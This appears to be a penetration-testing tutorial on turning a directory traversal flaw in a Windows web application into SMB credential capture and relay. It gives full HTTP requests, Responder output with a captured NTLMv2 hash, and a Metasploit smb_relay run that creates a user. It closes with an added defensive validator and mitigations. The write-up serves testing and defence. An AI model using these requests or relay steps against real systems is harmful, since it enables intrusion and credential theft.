SMB Attacks Through Directory Traversal

For some reason I've recently come across a number of web applications that allow for either directory traversal or filename manipulation attacks. These issues are typically used to reveal web server specific files and sensitive data files (web.config, salaryreport.pdf, etc.) and/or operating system files (SYSTEM, SAM, etc.).
Here's what a typical vulnerable request looks like:
GET /Print/FileReader.aspx?Id=report1.pdf&Type=pdf HTTP/1.1
Host: example.com
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;
Note the Id parameter in the URL. This is the vulnerable parameter that we will be attacking. We could easily change report1.pdf to any other file in the web directory (report2.pdf, web.config, etc.), but we can also turn our attack against the operating system.
Here's an example request for the win.ini file from the web server:
GET /Print/FileReader.aspx?Id=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini&Type=pdf HTTP/1.1
Host: example.com
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;
This is a more traditional directory traversal attack. We're moving up several directories so that we can get back into the Windows directory. Directory traversal attacks have been around for a long time, so this may be a pretty familiar concept. Now that we have the basic concepts out of the way, let's consider how we can leverage it against internally deployed web applications.
Internally deployed web applications can allow for a much wider attack surface (RDP, SMB, etc.) against the web server. This also makes directory traversal and file specification attacks more interesting. Instead of just accessing arbitrary files on the system, why don't we try to access other systems in the environment.
In order to pivot this attack to other systems on the network, we will be utilizing UNC file paths to capture and/or relay SMB credentials. As a point of clarification, the following examples are against web servers that are running on Windows. Following our previous examples, we will be using a UNC path to our attacking host, instead of report1.pdf, for the parameter.
Here's an example request:
GET /Print/FileReader.aspx?Id=\\192.168.1.123\test.pdf&Type=pdf HTTP/1.1
Host: example.com
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;
This will force the web server to look for test.pdf at 192.168.1.123. This will allow us to capture and crack the network hashes for the account running the web server service. Here's an example of how we would use Responder.py to do the SMB capture:
python Responder.py -i 192.168.1.123
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C

[+]NBT-NS & LLMNR responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface:eth0
Challenge set is: 1122334455667788
WPAD Proxy Server is:OFF
WPAD script loaded:function FindProxyForURL(url, host){return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:OFF
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF
Serving Executable via HTTP&WPAD is:OFF
Always Serving a Specific File via HTTP&WPAD is:OFF

[+]SMB-NTLMv2 hash captured from :  192.168.1.122
Domain is : EXAMPLE
User is : webserverservice
[+]SMB complete hash is : webserverservice[...]
Share requested: \\192.168.1.123\IPC$

[+]SMB-NTLMv2 hash captured from :  192.168.1.122
Domain is : EXAMPLE
User is : webserverservice
[+]SMB complete hash is : webserverservice::EXAMPLE:1122334455667788:57A39519B09AA3F4B6EE7B385CFB624C:01010000000000001A98853A1FFCCE0166E7A590D6DF976B0000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000
Share requested: \\192.168.1.123\test.pdf
Once we've captured the credentials, we can try to crack them with oclHashcat. If the server responds with LM hashes, you can use rainbow tables to speed things up. Once cracked, we can see where these credentials have access.
Let's pretend that we are not able to crack the hash for the web server account. We can also try to relay these credentials to another host on the internal network (192.168.1.124) that the account may have access to. This can be done with the SMB Relay module within Metasploit, and Responder recently added support for SMB relay. In the example below, we will use the Metasploit module to add a local user to the target server (192.168.1.124). The typical usage/payload for the module is to get a Meterpreter shell on the target system.
Module options (exploit/windows/smb/smb_relay):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SHARE       ADMIN$           yes       The share to connect to
   SMBHOST     192.168.1.124    no        The target SMB server
   SRVHOST     192.168.1.123    yes       The local host to listen on.
   SRVPORT     445              yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate
   SSLVersion  SSL3             no        Specify the version of SSL that should be used

Payload options (windows/adduser):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CUSTOM                     no        Custom group name to be used instead of default
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   PASS      Password123!     yes       The password for this user
   USER      netspi           yes       The username to create
   WMIC      false            yes       Use WMIC on the target to resolve administrators group

Exploit running as background job.
Server started.
<------------Truncated------------>
Received 192.168.1.122:21251 EXAMPLE\webserverservice LMHASH:b2--Truncated--03 NTHASH:46-- Truncated --00 OS: LM:
Authenticating to 192.168.1.124 as EXAMPLE\webserverservice...
AUTHENTICATED as EXAMPLE\webserverservice...
Connecting to the defined share...
Regenerating the payload...
Uploading payload...
Created OemWSPRa.exe...
Connecting to the Service Control Manager...
Obtaining a service manager handle...
Creating a new service...
Closing service handle...
Opening service...
Starting the service...
Removing the service...
Closing service handle...
Deleting OemWSPRa.exe...
Sending Access Denied to 192.168.1.122:21251 EXAMPLE\webserverservice
This may not be mind-blowing new information, but hopefully this gives you some good ideas on other ways to utilize directory traversal vulnerabilities.
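The three requests above all go through the same unchecked Id parameter. As an added example that is not part of the original post, here is a validator for that parameter (assuming the reports live in one fixed directory, REPORT_DIR, and are PDFs) that rejects the traversal, drive and UNC forms before the server ever opens a path, plus a log check that applies the same rule to constructed W3C-style log lines so the win.ini and \\192.168.1.123 requests stand out.

```python
import ntpath
import re
from urllib.parse import unquote

# Assumption for this example: the directory FileReader.aspx is meant to serve from.
REPORT_DIR = r"C:\inetpub\wwwroot\Print\reports"

def classify_file_id(raw_id: str) -> str:
    """Return 'ok' or the reason an Id value must be rejected. Decode first:
    the traversal and UNC forms normally arrive as %2e%2e%5c and %5c%5c."""
    value = unquote(raw_id)
    if not value or "\x00" in value:
        return "empty-or-null"
    if len(value) > 1 and value[0] in "\\/" and value[1] in "\\/":
        return "unc-path"         # \\host\share makes the server authenticate outbound
    if ":" in value:
        return "drive-or-stream"  # C:\... or NTFS stream syntax such as file::$DATA
    if ".." in value:
        return "traversal"
    if "/" in value or "\\" in value:
        return "path-separator"   # a report name never contains a separator
    if ntpath.splitext(value)[1].lower() != ".pdf":
        return "bad-extension"
    return "ok"

def safe_report_path(raw_id: str):
    """Resolve Id to a file under REPORT_DIR, or None if it was rejected."""
    if classify_file_id(raw_id) != "ok":
        return None
    resolved = ntpath.normpath(ntpath.join(REPORT_DIR, unquote(raw_id)))
    try:  # belt and braces: the normalised path must still sit under REPORT_DIR
        common = ntpath.commonpath([REPORT_DIR, resolved])
    except ValueError:  # different drive or UNC root
        return None
    return resolved if ntpath.normcase(common) == ntpath.normcase(REPORT_DIR) else None

# Constructed W3C-style log lines (not from the original post) carrying the
# same three Id values the post uses, URL-encoded as a proxy would log them.
SAMPLE_LOG = [
    "GET /Print/FileReader.aspx Id=report1.pdf&Type=pdf 200",
    "GET /Print/FileReader.aspx Id=..%5c..%5c..%5cwindows%5cwin.ini&Type=pdf 200",
    "GET /Print/FileReader.aspx Id=%5c%5c192.168.1.123%5ctest.pdf&Type=pdf 500",
]
ID_RE = re.compile(r"[?&\s]Id=([^&\s]*)")
def flag_log_lines(lines):
    """Return (line, reason) pairs for requests whose Id would be rejected."""
    found = [(line, ID_RE.search(line)) for line in lines]
    return [(line, classify_file_id(m.group(1))) for line, m in found
            if m and classify_file_id(m.group(1)) != "ok"]
```

The validator removes the trigger; requiring SMB signing on member servers breaks the relay shown above, and blocking outbound TCP 445 from the web tier removes the capture path even when a bad request slips through.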